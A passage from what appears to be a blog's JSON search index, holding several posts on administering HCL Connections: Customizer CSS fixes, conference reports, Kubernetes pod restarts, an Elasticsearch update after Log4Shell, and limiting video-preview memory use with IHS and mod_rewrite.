the Tiny Editors\u0026rsquo; \u003ccode\u003econfig.js\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/change-spellchecking-to-hunspell-in-tinymce/","title":"Change spellchecking to hunspell in TinyMCE"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/dictionary/","title":"Dictionary"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hunspell/","title":"Hunspell"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/spellchecking/","title":"Spellchecking"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/spellchecking/","title":"Spellchecking"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/tinymce/","title":"TinyMCE"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/customizer/","title":"Customizer"},{"body":"I created a git repository with some smaller CSS files to fix some annoyances within HCL Connections.\nI started with this to prevent Orient Me to load fonts from external URLs or Elasticsearch Metrics to break the UI on larger screens. These issues are solved after the last updates I got from support, but Blogs and Tailored Experience Wizard can be improved with some simple rules.\nActivate the CSS injection with Customizer The following steps enable the changes.\nRoute /te-creation-wizard through customizer Add the URL to NGINX configuration:\nlocation ~ ^/(files/customizer|files/app|communities/service/html|forums/html|search/web|homepage/web|social/home|mycontacts|wikis/home|blogs|news|activities/service/html|profiles/html|viewer|te-creation-wizard) { proxy_pass http://cnx7-rh8.stoeps.home:30301; } Add |te-creation-wizard to the rule which forwards to port 30301. Or find the line which starts with location ~ ^/(files/customizer|... and add it within the parenthesis.\nSo now the URL for Tailored Experience Wizards are routed through customizer.\nClone repository to customizer NFS share cd /pv-connections/customizer git clone https://github.com/stoeps13/stoeps-customizer-css.git Import app to customizer Import the file stoeps-customizer-css.json to the App Registry (URL: https://your-connections-url/appreg \u0026ndash; you need the admin role in Common App to access it!).\nOr use this snippet:\n{ \u0026#34;name\u0026#34;: \u0026#34;CSS Customizations\u0026#34;, \u0026#34;title\u0026#34;: \u0026#34;Fixing tiny annoying things\u0026#34;, \u0026#34;description\u0026#34;: \u0026#34;Adding some css to fix the most annoying things..\u0026#34;, \u0026#34;services\u0026#34;: [ \u0026#34;Customizer\u0026#34; ], \u0026#34;extensions\u0026#34;: [ { \u0026#34;name\u0026#34;: \u0026#34;Blogs\u0026#34;, \u0026#34;type\u0026#34;: \u0026#34;com.ibm.customizer.ui\u0026#34;, \u0026#34;payload\u0026#34;: { \u0026#34;include-files\u0026#34;: [ \u0026#34;stoeps-customizer-css/blogs.css\u0026#34; ], \u0026#34;cache-headers\u0026#34;: { \u0026#34;cache-control\u0026#34;: \u0026#34;max-age=0\u0026#34; } }, \u0026#34;path\u0026#34;: \u0026#34;blogs\u0026#34;, \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34; }, { \u0026#34;name\u0026#34;: \u0026#34;TE Wizard\u0026#34;, \u0026#34;type\u0026#34;: \u0026#34;com.ibm.customizer.ui\u0026#34;, \u0026#34;payload\u0026#34;: { \u0026#34;include-files\u0026#34;: [ \u0026#34;stoeps-customizer-css/te-wizard.css\u0026#34; ], \u0026#34;cache-headers\u0026#34;: { \u0026#34;cache-control\u0026#34;: \u0026#34;max-age=0\u0026#34; } }, \u0026#34;path\u0026#34;: \u0026#34;te-creation-wizard\u0026#34;, \u0026#34;state\u0026#34;: \u0026#34;enabled\u0026#34; } ] } Use New App \u0026gt; Code Editor \u0026gt; Import and save the changes to do this.\nWhich changes are active Blogs Without the customization, it is hard to see where a post starts or ends in the overview. With the customization Tailored Experience Wizard I started this, because the Tailored Experience Wizard does not recognize changes in the communities-policy.xml. So if you have changed the available Community Types, like described in Preventing members from creating specific community types , all Community Types are still visible and in case of Restricted Communities, the creation fails for Communities created from a template, even for public or moderated Communities.\nI have a case open with HCL on this, but until now there is no fix available.\nWithout the customization, all Community Types are allowed, there are two useless options on the left column. With the customization This will only hide the option, but when anybody changes the CSS in browser developer tools, or just use the API to create a community, this will be successful. The better option is to disable in the communities-policy.xml and wait for a fix until you enable the TE Wizard.\n","excerpt":"\u003cp\u003eI created a \u003ca href=\"https://github.com/stoeps13/stoeps-customizer-css\" target=\"_blank\"\u003egit repository \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n\nwith some smaller CSS files to fix some annoyances within HCL Connections.\u003c/p\u003e\n\u003cp\u003eI started with this to prevent Orient Me to load fonts from external URLs or\nElasticsearch Metrics to break the UI on larger screens.\nThese issues are solved after the last updates I got from support, but Blogs\nand Tailored Experience Wizard can be improved with some simple rules.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/fix-some-annoyances-with-customizer/","title":"Fix some annoyances with Customizer"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/hclcnx/","title":"Hclcnx"},{"body":"","excerpt":"","ref":"https://stoeps.de/keywords/conference/","title":"Conference"},{"body":"The annual conference of DNUG took place in Constance from 22nd to 23rd of June 2022.\nI attended the HCL Connections Roadmap session given by Rene Schimmer and David Strachan. They showed the updates for version 8 and beyond.\nTalking about version 8. HCL Connections will get named after evergreen trees from version 8. New naming scheme for Connections - ©HCL Software So next HCL Connections release is Cedar. For this version a public preview is available, when you are not already registered, have a look at following urls.\nAccess Preview 8 - https://hclsw.co/c8community Register for Preview 8 - https://hclsw.co/c8pre Connections 8 Preview - ©HCL Software There were several sessions on HCL Connections, but one I will long remember:\nEinmal in “schön” bitte: Wie wir die KOSMOS beim Umbau der HCL Connections Communities unterstützt haben Sandra Buehler and Olaf Braun did a very entertaining session and talked about their project to bring Connections within KOSMOS to a new level. The project should ensure that a selected number of communities meet current user requirements, both in terms of content and layout.\nI did a session on open-source tools I use on a regular basis. They can help to administrate, document or troubleshoot a Connections environment, but can also be used for most web applications.\nSession slides HCL Connections Admin Toolbox and as a list , if you only want to see the tools.\nYour browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/dachnug49-admintoolbox.html) ","excerpt":"\u003cp\u003eThe annual conference of \u003ca href=\"https://dnug.de\" target=\"_blank\"\u003eDNUG \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n took place in Constance from\n22nd to 23rd of June 2022.\u003c/p\u003e\n\u003cp\u003eI attended the HCL Connections Roadmap session given by Rene Schimmer and David Strachan.\nThey showed the updates for version 8 and beyond.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/dachnug49/","title":"Dachnug49 in Constance"},{"body":"After rebooting the Kubernetes server for HCL Connections Componentpack, I sometimes see that Orient Me is not working and just shows:\n{\u0026#34;error\u0026#34;:{\u0026#34;statusCode\u0026#34;:500,\u0026#34;message\u0026#34;:\u0026#34;Internal Server Error\u0026#34;}} I think one of the liveness checks could be improved, but for now the following commands restart just the necessary amount of pods to get Orient Me back running.\nkubectl rollout restart statefulset redis-server sleep 45 kubectl rollout restart deployment redis-sentinel sleep 90 kubectl rollout restart deployment orient-web-client ","excerpt":"\u003cp\u003eAfter rebooting the Kubernetes server for HCL Connections Componentpack,\nI sometimes see that Orient Me is not working and just shows:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-json\" data-lang=\"json\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e{\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;error\u0026#34;\u003c/span\u003e:{\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;statusCode\u0026#34;\u003c/span\u003e:\u003cspan style=\"color:#2aa198;font-weight:bold\"\u003e500\u003c/span\u003e,\u003cspan style=\"color:#268bd2;font-weight:bold\"\u003e\u0026#34;message\u0026#34;\u003c/span\u003e:\u003cspan style=\"color:#2aa198\"\u003e\u0026#34;Internal Server Error\u0026#34;\u003c/span\u003e}}\n\u003c/span\u003e\u003c/span\u003e\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e","ref":"https://stoeps.de/posts/2022/restart-orientwebclient/","title":"Restart Orient Me pods after Internal Server Error"},{"body":"CVE-2021-44228 was a very serious problem end of 2021, and we are still finding new occurrences, or security teams scan servers and find vulnerable log4j files. Don\u0026rsquo;t get me wrong most of these occurrences are not vulnerable any more, because the JVM is hardened like in the Elasticsearch 7 containers, or they use of the JVM parameter -Dlog4j2.formatMsgNoLookups=true.\nA good summary and explanation can be found in Mitigate Log4j / Log4Shell in Elasticsearch (CVE-2021-44228) and Apache Log4j2 Remote Code Execution (RCE) Vulnerability - CVE-2021-44228 - ESA-2021-31 . So some versions of Elasticsearch 7 are using the vulnerable library, but are not vulnerable and provide the RCE, because the official Elasticsearch images are using the Java Security Manager and the images from HCL are on Java 11 which is not vulnerable for RCE and information leakage with Log4Shell.\nbash-5.0# java -version openjdk version \u0026#34;11.0.9\u0026#34; 2020-10-20 OpenJDK Runtime Environment (build 11.0.9+11-alpine-r0) OpenJDK 64-Bit Server VM (build 11.0.9+11-alpine-r0, mixed mode) Elasticsearch mitigation summary matrix So the Security Bulletin: Apache Log4j 2 Vulnerability in Elasticsearch distributed in HCL Connections Component Pack(CVE-2021-44228) is not wrong when it tells us, that Connections 7 is not vulnerable for the log4shell CVE, but Componentpack 7.0.0.2 is using Elasticsearch 7.10.1 and this is distributed with log4j \u0026lt; 2.17.0.\nI tried to find an update in the knowledge base, but couldn\u0026rsquo;t find more as the mentioned security bulletin. So I opened a case and first I got told that the image is not vulnerable, and no updates are available, but I asked for updated images because the security team at my customer does not accept this.\nYesterday I got the following answer:\nES7 was not affected, however, out of an abundance of caution they did merge log4j 2.17.0 into their ES7 image so we have done the same. The existing log4j on our ES7 docker image has been deleted and replaced with 2.17.0.\nThe latest ES7 image which includes the updated log4j 2.17.0 is available on Flexnet. Below is the link to Connections 7 downloads: https://hclsoftware.flexnetoperations.com/flexnet/operationsportal/entitledDownloadFile.action?downloadPkgId=HCL_Connections_7.0\u0026orgId=HCL The customer should download the following:\nReadMe which includes instructions to load and register the new ES7 docker image along w/ the image and helm chart: ReadMe for the Elastic Search 7 update for HCL Connection Component Pack 3.28KB May 20, 2022 elasticsearch720220310-143242-ReadMe.txt\nThis package contains an update for Elastic Search 7 for HCL Connections Component Pack v7.0.0.x and v7.0.0.2 560.03MB May 02, 2022 elasticsearch720220310-143242.tgz\nThis package contains an updated helm chart for Elastic Search 7 for HCL Connections Component Pack v7.0.0.x and v7.0.0.2 38.6KB May 02, 2022 elasticsearch7-0.1.0-20220310-143242.tgz\nHCL Support The images to update Elasticsearch 7 are availble since May on Flexnet!\nAs this is nowhere documented, I asked for an updated knowledge base article and post it here, so you can update your environment too. Main advantage of the image update: no more questions why your software is staying with old and vulnerable libraries.\n","excerpt":"\u003cp\u003eCVE-2021-44228 was a very serious problem end of 2021, and we are still finding new occurrences, or security teams scan servers and find vulnerable log4j files. Don\u0026rsquo;t get me wrong most of these occurrences are not vulnerable any more, because the JVM is hardened like in the Elasticsearch 7 containers, or they use of the JVM parameter \u003ccode\u003e-Dlog4j2.formatMsgNoLookups=true\u003c/code\u003e.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/elasticsearch7-update/","title":"Elasticsearch7 Update"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/update/","title":"Update"},{"body":"The last days I attended Engage 2022 in the Bruges Meeting \u0026amp; Convention Centre (BMCC) . The first in person event for HCL Software for two years. Engage 2020 was the last event before the big lockdowns. Meeting so many friends again after so long time felt really awesome, and I enjoyed these days very much. We had good conversations and some Belgium beer to celebrate the reunion.\nThis was my 6th or 7th Engage and as always the organizers around Theo and his wife Hilde did a great job, arriving at the venue felt like coming home.\nDuring the keynote with Richard Jefts and Jason Gary we got the new naming conventions for new releases, so Domino will get river names (next version Danube) and Connections will get named after trees (Cedar).\nHCL Connections roadmap session with Adam Gartenberg and Rene Schimmer showed the updates for version 8 and \u0026lsquo;Connections v8 Live Demo: Collaboration just got easier!\u0026rsquo; with Stefan Hessler and David Bell gave insights to the new customizations in Connections 8 . Like changing the top and side navigation or add a banner notification. The preview of Connections 8 was updated to the next iteration last week, if you are not already registered, here is the link to get an invitation .\nThe following images are copied from the original slide deck, authors: Stefan Hessler, David Bell! The complete slide deck is available here .\nConnections 8 GUI - © HCL Software One of the new features in Connections 8 is a banner to inform users directly. The message will be displayed on top of the page.\nNew banner function in Connections 8 - © HCL Software So you can enable the banner with some API calls, so you can integrate into your CI/CD pipeline or tool chain.\nNew banner in Connections 8 - © HCL Software I have not made photos from these slides, they will be available the next days on the Engage homepage and I will update the posts with some matching slides. There were a lot of important HCLers available during the event, product management, developers and architects were open and answered questions or discussed features of Connections 8.\nIf you missed Engage, then have a look at DACHNUG , which takes place from 20th to 22nd June 2022 in Konstanz .\nI did the session named \u0026lsquo;HCL Connections Admin Toolbox\u0026rsquo; and showed a collection of tools I use for my daily work.\nHCL Connections Admin Toolbox Best viewed in fullscreen (use F11 in any browser) I created a new page with all links to tools I use , so when you search the download links mentioned in the slide deck, then you can use this overview. Your browser does not support this, go to the presentation directly: [HCL Connections Admin Toolbox](https://share.stoeps.de/engage2022-admintoolbox.html) ","excerpt":"\u003cp\u003eThe last days I attended \u003ca href=\"https://engage.ug\" target=\"_blank\"\u003eEngage 2022 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n in the \u003ca href=\"https://www.visitbrugesconventionbureau.be\" target=\"_blank\"\u003e\nBruges Meeting \u0026amp; Convention Centre (BMCC) \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. The first in person event for HCL Software for two years. Engage 2020 was the last event before the big lockdowns. Meeting so many friends again after so long time felt really awesome, and I enjoyed these days very much. We had good conversations and some Belgium beer to celebrate the reunion.\u003c/p\u003e\n\u003cp\u003eThis was my 6th or 7th Engage and as always the \u003ca href=\"https://engage.ug/Engage2.nsf/Pages/about\" target=\"_blank\"\u003eorganizers \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n around \u003ca href=\"https://twitter.com/theoheselmans\" target=\"_blank\"\u003eTheo \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n and his wife Hilde did a great job, arriving at the venue felt like coming home.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/engage2022/","title":"Engage 2022"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/communities/","title":"Communities"},{"body":"Today I got the question of how to disable the highlights app in Connections 7. When you follow the documentation for Connections 6.0CR6 you get an error message (and the document is not available in Connections 7).\nI commented out the widget definition in widgets-config.xml like described in the documentation for the former release.\n\u0026lt;!-- IBM CONNECTIONS ENGAGEMENT CENTRE - ICEC4Communities --\u0026gt; \u0026lt;!-- \u0026lt;widgetDef bundleRefId=\u0026#34;highlights\u0026#34; defId=\u0026#34;Highlights\u0026#34; description=\u0026#34;Highlights.description\u0026#34; modes=\u0026#34;view fullpage\u0026#34; showInPalette=\u0026#34;true\u0026#34; themes=\u0026#34;wpthemeNarrow wpthemeWide wpthemeBanner\u0026#34; uniqueInstance=\u0026#34;true\u0026#34; url=\u0026#34;{webresourcesSvcRef}/../../xcc/templates/iWidgetXCCCommunityDefinition.xml\u0026#34;\u0026gt; \u0026lt;itemSet\u0026gt; \u0026lt;item name=\u0026#34;lang\u0026#34; value=\u0026#34;{lang}\u0026#34;/\u0026gt; \u0026lt;/itemSet\u0026gt; \u0026lt;/widgetDef\u0026gt; --\u0026gt; \u0026lt;!-- IBM CONNECTIONS ENGAGEMENT CENTRE - ICEC4Communities --\u0026gt; \u0026lt;templates\u0026gt; \u0026lt;!-- default template will be used to display the default widgets --\u0026gt; \u0026lt;template id=\u0026#34;default\u0026#34;\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;ImportantBookmarks\u0026#34; instanceId=\u0026#34;ImportantBookmarks1\u0026#34; uiLocation=\u0026#34;col3\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;MembersSummary\u0026#34; instanceId=\u0026#34;MembersSummary1\u0026#34; uiLocation=\u0026#34;col3\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;StatusUpdates\u0026#34; instanceId=\u0026#34;StatusUpdates1\u0026#34; uiLocation=\u0026#34;col2statusposts\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;description\u0026#34; instanceId=\u0026#34;description1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Forum\u0026#34; instanceId=\u0026#34;ForumInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Bookmarks\u0026#34; instanceId=\u0026#34;BookmarksInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Files\u0026#34; instanceId=\u0026#34;FilesInstance1\u0026#34; uiLocation=\u0026#34;col2\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Tags\u0026#34; instanceId=\u0026#34;Tags1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;!-- \u0026lt;widgetInstance defIdRef=\u0026#34;Highlights\u0026#34; instanceId=\u0026#34;Highlights1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt;--\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Blog\u0026#34; instanceId=\u0026#34;Blog1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;Wiki\u0026#34; instanceId=\u0026#34;Wiki1\u0026#34; uiLocation=\u0026#34;col1\u0026#34;/\u0026gt; \u0026lt;widgetInstance defIdRef=\u0026#34;RichContent\u0026#34; ifGatekeeperSet=\u0026#34;COMMUNITIES_TOP_MENU_WITH_BANNER_DEFAULT_LAYOUT\u0026#34; instanceId=\u0026#34;RichContent1\u0026#34; uiLocation=\u0026#34;banner\u0026#34;/\u0026gt; \u0026lt;/template\u0026gt; \u0026lt;/templates\u0026gt; Sychronize the nodes Restart the application server hosting WidgetContainer and Communities Application Now create a new community and you will get one of the following errors Error with Community Template Wizard: Bad Request Error with default Community create dialog: Your session timed out or a server error occurred. Please resubmit your changes The error message does not help to find the issue, no errors are written to the SystemOut.log.\nSolution Open the Gatekeeper settings on https://YOUR_CNX_URL/connections/config/highway.main.gatekeeper.tiles and change the setting COMMUNITIES_HIGHLIGHTS_AS_OVERVIEW from True to False.\nTo access the gatekeeper settings, you need the admin role in the Common application.\nGatekeeper Setting for COMMUNITIES_HIGHLIGHTS_AS_OVERVIEW No need to restart an application or application server, just go back to Communities and try to create a community again. This time it works without error messages.\n","excerpt":"\u003cp\u003eToday I got the question of how to disable the highlights app in Connections 7. When you follow the \u003ca href=\"https://help.hcltechsw.com/connections/v6/admin/migrate/install_cr3_disable_highlights.html\" target=\"_blank\"\u003edocumentation for Connections 6.0CR6 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n you get an error message (and the document is not available in Connections 7).\u003c/p\u003e\n\u003cp\u003eI commented out the widget definition in \u003ccode\u003ewidgets-config.xml\u003c/code\u003e like described in the documentation for the former release.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/disable_highlights_app_in_connections7/","title":"Disable Highlights App in Connections 7"},{"body":"Our users are often building Highlights and Overview pages within HCL Connections Communities, where they link from one description widget to RTE or from one RTE widget to another.\nWe found that these anchor links often disappear behind the top navigation bar and the users wonder what happened.\nThe link on the left top points to an anchor link on the right side of the Overview Now the anchor link was clicked, and you see the target anchor is not visible I created a customization file in \u0026lt;SHARED DIRECTORY\u0026gt;/customization/themes/hikariTheme/applications/communities.css with the following content:\nhtml { scroll-padding-top: 250px; } Changed the versionStamp in LotusConnections-config.xml and restarted the application servers. Now when we click the link in Communities Overview:\nNow the target anchor is visible Community Highlights The same offset can be seen in the Highlights App and the solution above will solve it there too.\nHighlights with a link pointing to an anchor link Link clicked with default setting Link clicked with the deployed communities.css ","excerpt":"\u003cp\u003eOur users are often building Highlights and Overview pages within HCL Connections Communities, where they link from one description widget to RTE or from one RTE widget to another.\u003c/p\u003e\n\u003cp\u003eWe found that these anchor links often disappear behind the top navigation bar and the users wonder what happened.\u003c/p\u003e","ref":"https://stoeps.de/posts/2022/add_offset_to_community_overview_anchor_links/","title":"Add offset to community overview anchor links"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/highlights/","title":"Highlights"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/links/","title":"Links"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/blog/","title":"Blog"},{"body":"In late 2021 I had an HCL Connections environment starting swapping, because the AppCluster used more than 30 GB of memory.\nThe system has\ntwo nodes is installed with the medium-sized deployment option About 7500 users with a high adoption rate, because Connections is also used as intranet What happened? Log4j CVE-2021-22448 couldn\u0026rsquo;t be patched immediately for the video streaming platform and some teams shared blog posts with video messages on Connections.\nAnalysis The amount of memory an application server is using is not limited through the Java heap size. File caching happens on top of Java heap.\nSo I found that each user who was opening a video in the file viewer added about the file size to the server memory. Ten users watching a 500 MB video increased the memory usage with 5 GB.\nThe AppCluster members used about 8 GB of memory after startup, but the videos were linked on the start page and so the amount grew to 30-35 GB within minutes and the servers started swapping.\nQuick check in the HTTPServer access.log showed that a lot of mp4 files were accessed since restart and the video length of an hour did the rest.\nI could reproduce with opening multiple browser tabs showing videos, the memory usage increased immediately. So one user can slow down a Connections\u0026rsquo; environment with opening large videos in parallel, until the server starts swapping or even crashes.\nhtop displaying the normal memory amount for AppsCluster_server1 htop displaying the memory amount for AppsCluster_server1 when 1 video is open Step to reproduce Upload a large video to your personal library in Connections check memory usage of AppsCluster (or FilesCluster Open the video in files check memory usage of AppsCluster (or FilesCluster) Open the same video in multiple tabs and check the memory consumption of the application server Workaround / Solution My first idea was to disable video preview at all, but there is no option available.\nGatekeeper has a setting FILEVIEWER_PREVIEW_VIDEOJS, default set to true, but I couldn\u0026rsquo;t find out what changes when you disable it.\nfile-preview-config.xml mentions mp4, but removing it has no effect in the streaming of mp4 in files viewer.\nmime.types with onWebopen only works when inlineDownload is enabled in files-config.xml.\nI opened a case at HCL Support and asked if there is some undocumented option to disable video preview. The first response was enabling \u0026ldquo;Download through IHS\u0026rdquo; , which always was recommended for performance in the Tuning guide .\nDownload through IHS The system with the swapping issue, had some issues with NFS access rights in the past, so file download through IHS was not active, but I gave it a try again.\nRequirements For downloads through IHS the shared directory needs to be mounted on the web server.\nhttps://help.hcltechsw.com/connections/v7/admin/install/t_install_post_files_downloads.html Possible problems\nwrong user (or root user) → use setfacl and add the IHS user to the upload path of files DMZ → firewall exception or additional web server on the WebSphere node (proxy pass from DMZ) mixed operating systems (I can\u0026rsquo;t get this working when WebSphere runs on Windows and IHS on Linux) -\u0026gt; possible workaround is mod_rewrite and rewriting \\ and / Copy Apache module Like in the part about uploading through IHS server, the documentation is not accurate. The HTTPServer in all my environments (installed manually or with the connections-automation project ), is 64-bit! I used /opt/HCL/Connections/xkit/ihs/mod_ibm_local_redirect/linux_x86_64_ap2/mod_ibm_local_redirect.so and copied it to /opt/IBM/HTTPServer/modules.\nhttpd.conf LoadModule ibm_local_redirect_module modules/mod_ibm_local_redirect.so Alias /files_content /opt/IBM/SharedArea/files/upload/ \u0026lt;Directory \u0026#34;/opt/IBM/SharedArea/files\u0026#34;\u0026gt; Order Deny,Allow Deny from all Allow from env=REDIRECT_FILES_CONTENT \u0026lt;/Directory\u0026gt; \u0026lt;Location /files\u0026gt; IBMLocalRedirect On IBMLocalRedirectKeepHeaders X-LConn-Auth,Cache-Control,Content-Type,Content-Disposition,Last-Modified,ETag,Content-Language,Set-Cookie,Title,X-UA-Compatible SetEnv FILES_CONTENT true \u0026lt;/Location\u0026gt; files-config.xml (extended to 1 GB max upload size) \u0026lt;download\u0026gt; \u0026lt;modIBMLocalRedirect enabled=\u0026#34;true\u0026#34; hrefPathPrefix=\u0026#34;/files_content\u0026#34; /\u0026gt; \u0026lt;/download\u0026gt; \u0026lt;file\u0026gt; \u0026lt;media maximumSizeInKb=\u0026#34;1024000\u0026#34;/\u0026gt; \u0026lt;!-- Allow 1 GB uploads --\u0026gt; \u0026lt;/file\u0026gt; \u0026lt;api\u0026gt; \u0026lt;simpleDownloadAPI maximumSizeInKb=\u0026#34;10240\u0026#34;\u0026gt;\u0026lt;/simpleUploadAPI\u0026gt; \u0026lt;!-- WebSphere is used for 10 MB Downloads --\u0026gt; \u0026lt;/api\u0026gt; Restarting the system and the memory usage of the AppsCluster members stayed in a range of the configured java heap size, even when I opened multiple large videos in parallel.\nYou should also enable File uploads through IHS! Upload Files via IBM HTTPServer (mod_ibm_upload) to HCL Connections Setting the WebSphere Application Server WebContainer to synchronous mode The documentation mentions, that you shall enable synchronous mode for the application server hosting the files application. This helps a to prevent the server from using all memory, but it still uses more, and it doesn\u0026rsquo;t free up used memory during my tests.\nhtop displaying the memory amount for AppsCluster_server1 when 5 video is open and synchronous mode is enabled Alternative solution with mod_rewrite I discussed this issue with development through a product case at HCL Support, and finally I got following suggestion to disable preview:\nEnsure to enable the rewrite module. If the following line of text is commented out, uncomment it. If the statement is not present, add it.\nLoadModule rewrite_module modules/mod_rewrite.so Add the following:\n# Block viewer from previewing files RewriteCond %{QUERY_STRING} ^.*(downloadType=view).* [NC] RewriteRule ^(.*)$ - [F,L] Make sure that the configuration lines are in a global context or in each virtual host, depending on your setup.\nHCL Support I tried this in my demo environment:\nVideo Preview in Files shows \u0026ldquo;No preview available\u0026rdquo; and I can download the file Embedding the video with Embed uploaded videos to IBM Connections blog post or wiki page is still working embedded videos do not autoplay and are not that problematic in my eyes image and other previews are working as expected, so a perfect workaround to disable video previews Update 2022-03-09 optimized rewrite rule No need to define lengthy RegExp with wild-card start and end if you only care about the match in the middle No need to define capture groups if you don\u0026rsquo;t use backreferences [F|forbidden] RewriteRule Flags implies L # Block viewer from previewing files RewriteCond %{QUERY_STRING} downloadType=view [NC] RewriteRule .* - [F] Thanks @KroegerBen for the optimization.\nSummary Best solution to prevent large memory consumption is the usage of the download / rewrite module in the HTTP Server. Synchronous mode helped a bit, but I would disable the video preview with mod_rewrite when there is no possibility to use download through IHS.\n","excerpt":"\u003cp\u003eIn late 2021 I had an HCL Connections environment starting swapping, because the AppCluster used more than 30 GB of memory.\u003c/p\u003e\n\u003cp\u003eThe system has\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003etwo nodes\u003c/li\u003e\n\u003cli\u003eis installed with the medium-sized deployment option\u003c/li\u003e\n\u003cli\u003eAbout 7500 users with a high adoption rate, because Connections is also used as intranet\u003c/li\u003e\n\u003c/ul\u003e","ref":"https://stoeps.de/posts/2022/videostreaming_in_hcl_connections/","title":"Videostreaming in HCL Connections"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/webserver/","title":"Webserver"},{"body":"","excerpt":"","ref":"https://stoeps.de/tags/cfix/","title":"Cfix"},{"body":"Yesterday I updated a Connections environment to the latest CFix. In other environments I found that PushNotification Cluster was not started after the update, like described in the knowledge base document PushNotification broken after upgrading to CFix.65CR1.2201 . In this update the application and cluster were running, but not working at all. Browser console.log showed the error:\nError connecting to push auth sync service /servic/info: RequestError: Unable to load https://cnx-fqdn/push/service/info status: 500 console.log error after installing the CFix So I tweaked the workaround from the knowledge base document above. I used the find command with the option -exec which is great for running commands on all found files. So we can search and move the files in one step.\nOn each Application Server Node, go to this directory: # \u0026lt;WAS_HOME\u0026gt;/profiles/\u0026lt;profile_name\u0026gt;/installedApps/ConnectionsCell/PushNotification.ear cd /opt/IBM/WebSphere/AppServer/profiles/AppSrv01/installedApps/ConnectionsCell/PushNotification.ear Move files # Create a backup directory mkdir ~/backup_pns # Find and move the files find -name \\*slf4j\\*1.7.5\\* -exec mv {} ~/backup_pns \\; Restart the PushNotification application or PushNotification Cluster PushNotification is very important for the Desktop Plugins, so don\u0026rsquo;t underestimate the importance of this app. ","excerpt":"\u003cp\u003eYesterday I updated a Connections environment to the latest CFix. In other environments I found that PushNotification Cluster was not started after the update, like described in the knowledge base document \u003ca href=\"https://support.hcltechsw.com/csm?id=kb_article\u0026amp;sysparm_article=KB0096292\" target=\"_blank\"\u003ePushNotification broken after upgrading to CFix.65CR1.2201 \u003ci class=\"las la-external-link-alt la-xs\"\u003e\u003c/i\u003e\u003c/a\u003e\n. In this update the application and cluster were running, but not working at all. Browser console.log showed the error:\u003c/p\u003e\n\u003cdiv class=\"highlight\"\u003e\u003cpre tabindex=\"0\" style=\"color:#586e75;background-color:#eee8d5;-moz-tab-size:4;-o-tab-size:4;tab-size:4;\"\u003e\u003ccode class=\"language-gdscript3\" data-lang=\"gdscript3\"\u003e\u003cspan style=\"display:flex;\"\u003e\u003cspan\u003e\u003cspan style=\"color:#268bd2\"\u003eError\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003econnecting\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eto\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003epush\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eauth\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003esync\u003c/span\u003e \u003cspan style=\"color:#268bd2\"\u003eservice\u003c/span\u003e /\u003cspan style=\"color:#268bd2\"\u003eservic\u003c/span\u003e/\u003cspan style=\"color:#268bd2\"\u003einfo\u003c/span\u003e: \u003cspan style=\"color:#268bd2\"\u003eRequestError\u003c/span\u003e: \u003cspan 